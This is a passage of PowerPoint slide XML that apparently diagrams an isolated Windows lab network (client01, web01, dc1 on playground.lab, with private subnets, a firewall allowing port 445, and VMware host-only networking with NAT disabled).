                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E9FC298-9702-4675-B93D-A43F9F95BCCF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8359241" y="4319287"/>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3" name="Cube 42">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0EF1D84-BAFD-4F41-9E0A-E3AC78C441A9}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9448203" y="4316021"/>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4" name="Cube 43">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60CAFEBF-A804-4F02-8C08-A2555974C67F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="10537166" y="4319287"/>
                  <a:ext cx="941153" cy="564657"/>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sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="Cube 44">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8BD0900-71BF-430D-A491-B230E53E8302}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9687543" y="3605340"/>
                  <a:ext cx="320040" cy="564657"/>
                </a:xfrm>
                <a:prstGeom prst="cub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D2541"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="32" name="Graphic 31" descr="Fire with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74C43F75-731B-4088-9809-369CBD6C3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7684" y="2867320"/>
                <a:ext cx="2573647" cy="2653580"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27" name="Group 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DE9592F-C0C3-418A-A025-DE2899F1FF0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7673827" y="3907402"/>
              <a:ext cx="2447162" cy="573417"/>
              <a:chOff x="4924128" y="2954487"/>
              <a:chExt cx="2523167" cy="914400"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:scene3d>
              <a:camera prst="isometricRightUp"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="28" name="Graphic 27" descr="Binary with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD63196F-8E85-4827-B1A9-647872154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4128" y="2954487"/>
                <a:ext cx="914400" cy="914400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:sp3d/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Graphic 28" descr="Binary with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C02EB52-D8C9-4232-9782-909A864E8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2232" y="2954487"/>
                <a:ext cx="914400" cy="914400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:sp3d/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="30" name="Graphic 29" descr="Binary with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CC7FAD3-8889-41AE-AA83-E260D391AD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2895" y="2954487"/>
                <a:ext cx="914400" cy="914400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:sp3d/>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13707278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Example Setup</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7" name="Graphic 6" descr="Full Brick Wall with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4515B73-C175-4003-BA25-5769EF089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919094" y="3362325"/>
            <a:ext cx="933450" cy="933450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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client01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A08CB0E-608B-4965-BEDB-7B497F285D58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4831821" y="4144059"/>
            <a:ext cx="11079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 445 allowed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6247179A-4CF1-4395-8EE9-677A65E6A494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508587" y="2515285"/>
            <a:ext cx="17876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FB96E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>172.16.100.150</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37F14276-B817-40F9-814E-7243AE4DEF44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248044" y="2515285"/>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192.168.100.150</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8780689" y="3828828"/>
            <a:ext cx="2197215" cy="2184263"/>
            <a:chOff x="8723923" y="3484295"/>
            <a:chExt cx="2197215" cy="2184263"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7393C69D-112D-469F-8C57-ED67985ED755}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8723923" y="3623546"/>
              <a:ext cx="2182202" cy="1885882"/>
              <a:chOff x="8685911" y="2245520"/>
              <a:chExt cx="1058076" cy="914400"/>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9587" y="2245520"/>
                <a:ext cx="914400" cy="914400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="24" name="Graphic 23" descr="Full Brick Wall with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C8D44E7-B728-47F7-A24D-F1CEC47C9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5911" y="2612231"/>
                <a:ext cx="442242" cy="442242"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>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web01</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="TextBox 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04264196-1D35-45AD-B836-946F07E362E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9005229" y="3484295"/>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192.168.100.160</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8780689" y="1119598"/>
            <a:ext cx="2182202" cy="2164384"/>
            <a:chOff x="8712967" y="1058462"/>
            <a:chExt cx="2182202" cy="2164384"/>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dc1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="TextBox 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3B5C5AD-A0F5-4449-8B50-D40138EE8C8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8956772" y="1058462"/>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192.168.100.100</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="41" name="Group 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E35D6E4-72A2-46FE-ACDA-2A4972ED3B75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8712967" y="1197713"/>
              <a:ext cx="2182202" cy="1885882"/>
              <a:chOff x="8685911" y="2245520"/>
              <a:chExt cx="1058076" cy="914400"/>
            </a:xfrm>
          </p:grpSpPr>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9587" y="2245520"/>
                <a:ext cx="914400" cy="914400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="43" name="Graphic 42" descr="Full Brick Wall with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F127F9CE-08C7-4070-95FE-40C102281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5911" y="2612231"/>
                <a:ext cx="442242" cy="442242"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>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6D2B">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>playground.lab</a:t>
            </a:r>
            <a:endPar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487887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1A511-3411-45BB-BD05-3A1A997E0404}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2581275" y="3264777"/>
            <a:ext cx="4729274" cy="27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38" name="Straight Connector 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDBB129F-0253-4CC0-B8B1-2C9B9DFAB107}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2711070" y="3399883"/>
            <a:ext cx="4599479" cy="991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The Goal</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7" name="Graphic 6" descr="Full Brick Wall with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4515B73-C175-4003-BA25-5769EF089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919094" y="3362325"/>
            <a:ext cx="933450" cy="933450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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client01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A08CB0E-608B-4965-BEDB-7B497F285D58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4831821" y="4144059"/>
            <a:ext cx="11079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 445 allowed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6247179A-4CF1-4395-8EE9-677A65E6A494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508587" y="2515285"/>
            <a:ext cx="17876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FB96E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>172.16.100.150</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37F14276-B817-40F9-814E-7243AE4DEF44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248044" y="2515285"/>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192.168.100.150</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8780689" y="3828828"/>
            <a:ext cx="2197215" cy="2184263"/>
            <a:chOff x="8723923" y="3484295"/>
            <a:chExt cx="2197215" cy="2184263"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7393C69D-112D-469F-8C57-ED67985ED755}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8723923" y="3623546"/>
              <a:ext cx="2182202" cy="1885882"/>
              <a:chOff x="8685911" y="2245520"/>
              <a:chExt cx="1058076" cy="914400"/>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9587" y="2245520"/>
                <a:ext cx="914400" cy="914400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="24" name="Graphic 23" descr="Full Brick Wall with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C8D44E7-B728-47F7-A24D-F1CEC47C9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5911" y="2612231"/>
                <a:ext cx="442242" cy="442242"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>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web01</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="TextBox 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04264196-1D35-45AD-B836-946F07E362E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9005229" y="3484295"/>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192.168.100.160</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="Group 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8117CDE1-9CA9-4321-8E58-24EDAB00B11B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8780689" y="1119598"/>
            <a:ext cx="2182202" cy="2164384"/>
            <a:chOff x="8712967" y="1058462"/>
            <a:chExt cx="2182202" cy="2164384"/>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dc1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="TextBox 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3B5C5AD-A0F5-4449-8B50-D40138EE8C8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8956772" y="1058462"/>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60000"/>
                      <a:lumOff val="40000"/>
                    </a:srgbClr>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>192.168.100.100</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="41" name="Group 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E35D6E4-72A2-46FE-ACDA-2A4972ED3B75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8712967" y="1197713"/>
              <a:ext cx="2182202" cy="1885882"/>
              <a:chOff x="8685911" y="2245520"/>
              <a:chExt cx="1058076" cy="914400"/>
            </a:xfrm>
          </p:grpSpPr>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9587" y="2245520"/>
                <a:ext cx="914400" cy="914400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="43" name="Graphic 42" descr="Full Brick Wall with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F127F9CE-08C7-4070-95FE-40C102281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5911" y="2612231"/>
                <a:ext cx="442242" cy="442242"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5" descr="Ladybug with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E51B2AE-4AB5-45B0-858D-63118600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0369" y="2934455"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Connector: Elbow 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B480AD4C-E309-484B-BB8D-EBC4B080597A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7310549" y="3399883"/>
            <a:ext cx="1470140" cy="1390507"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 55435"/>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8656C96-B507-4EFB-872C-D29DC72937A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7310549" y="1882968"/>
            <a:ext cx="1658383" cy="1516915"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49160"/>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040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61EA9-0BB1-457F-A684-A9CE8B8AF9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616303A-2DF1-4699-87C2-7F79D6C0EEB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VMWare Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E163D8E-0F0D-4134-81E7-DCDE598C049A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413580" y="2497433"/>
            <a:ext cx="4580286" cy="2320333"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trial Windows licenses </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two virtual networks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>host only</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VMnet2 (192.168.100.0/24) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VMnet3 (172.16.100.0/24)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NAT adapter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>disabled</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92A0298B-A2C3-4442-8CE0-D12E673C4FC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5268015" y="1373820"/>
            <a:ext cx="6510405" cy="1522520"/>
            <a:chOff x="2840797" y="1296140"/>
            <a:chExt cx="6510405" cy="1522520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C427A349-80D7-4A1C-B70D-FA7B479D554D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2840797" y="1296140"/>
              <a:ext cx="6510405" cy="1522520"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A986623-3185-464D-AAAA-80C6AC5EF970}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
